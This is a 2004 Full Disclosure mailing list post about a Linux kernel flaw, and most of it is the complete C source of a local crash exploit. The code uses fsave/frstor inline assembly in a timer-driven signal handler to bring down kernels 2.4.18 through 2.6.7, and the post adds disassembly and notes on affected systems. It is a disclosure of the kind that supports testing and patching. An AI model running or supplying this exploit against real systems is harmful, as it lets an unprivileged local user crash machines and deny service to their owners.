Full Disclosure mailing list archives
Re: linux kernel local crash seen on slashdot
From: Lorenzo Hernandez Garcia-Hierro <lorenzohgh () tuxedo-es org>
Date: Mon, 14 Jun 2004 19:13:10 +0200
Hi,
Looked through the archives here and didn't see this one yet.. http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
There is also an article in Slashdot ( i've been out of the list and possibly others sent the link , anyway i'm pasting it here ): http://slashdot.org/articles/04/06/14/118209.shtml?tid=106&tid=126&tid=128&tid=185&tid=190 There is proof of concept code at some of the slashdot comments,this is a modified version with more information ( and a little change of fsave line.): === /* -------------------- * frstor Local Kernel exploit * Crashes any kernel from 2.4.18 * to 2.6.7 because frstor in assembler inline offsets in memory by 4. * Original proof of concept code * by stian_@_nixia.no. * Added some stuff by lorenzo_@_gnu.org * and fixed the fsave line with (*fpubuf). * -------------------- */ /* --------- Some debugging information made available by stian_@_nixia.no --------- TakeDown: pushl %ebp movl %esp, %ebp subl $136, %esp leal -120(%ebp), %eax movl %eax, -124(%ebp) #APP fsave -124(%ebp) #NO_APP subl $4, %esp pushl $1 pushl $.LC0 pushl $2 call write addl $16, %esp leal -120(%ebp), %eax movl %eax, -128(%ebp) #APP frstor -128(%ebp) #NO_APP leave ret */ #include <sys/time.h> #include <signal.h> #include <unistd.h> static void TakeDown(int ignore) { char fpubuf[108]; // __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf)); __asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf)); write(2, "*", 1); __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf)); } int main(int argc, char *argv[]) { struct itimerval spec; signal(SIGALRM, TakeDown); spec.it_interval.tv_sec=0; spec.it_interval.tv_usec=100; spec.it_value.tv_sec=0; spec.it_value.tv_usec=100; setitimer(ITIMER_REAL, &spec, NULL); while(1) write(1, ".", 1); return 0; } // <<EOF === Cheers, PS: My 2.4.25-gentoo seems not affected by this but the bf24 flavour of my old box is vulnerable. -- Lorenzo Hernandez Garcia-Hierro <lorenzohgh () tuxedo-es org>
Attachment:
signature.asc
Description: Esta parte del mensaje está firmada digitalmente
Current thread:
- Multiple Antivirus Scanners DoS attack. [summery] bipin gautam (Jun 14)
- Re: Multiple Antivirus Scanners DoS attack. [summery] npguy (Jun 14)
- Re: Multiple Antivirus Scanners DoS attack. [summery] bipin gautam (Jun 14)
- Re: Multiple Antivirus Scanners DoS attack. [summery] Jan Muenther (Jun 14)
- Re: Multiple Antivirus Scanners DoS attack. [summery] bipin gautam (Jun 14)
- Re: Multiple Antivirus Scanners DoS attack bipin gautam (Jun 14)
- linux kernel local crash seen on slashdot Skip Duckwall (Jun 14)
- Re: linux kernel local crash seen on slashdot Lorenzo Hernandez Garcia-Hierro (Jun 14)
- Re: linux kernel local crash seen on slashdot npguy (Jun 14)
- Re: linux kernel local crash seen on slashdot Stefan SF (Jun 15)
- Re: linux kernel local crash seen on slashdot Dave Monnier, IT Security Office, Indiana University (Jun 15)
- Re: Multiple Antivirus Scanners DoS attack. [summery] bipin gautam (Jun 14)
- Re: Multiple Antivirus Scanners DoS attack. [summery] npguy (Jun 14)
- Re: Multiple Antivirus Scanners DoS attack. [summery] Jim Krok (Jun 14)
- Re: Multiple Antivirus Scanners DoS attack. [summery] npguy (Jun 14)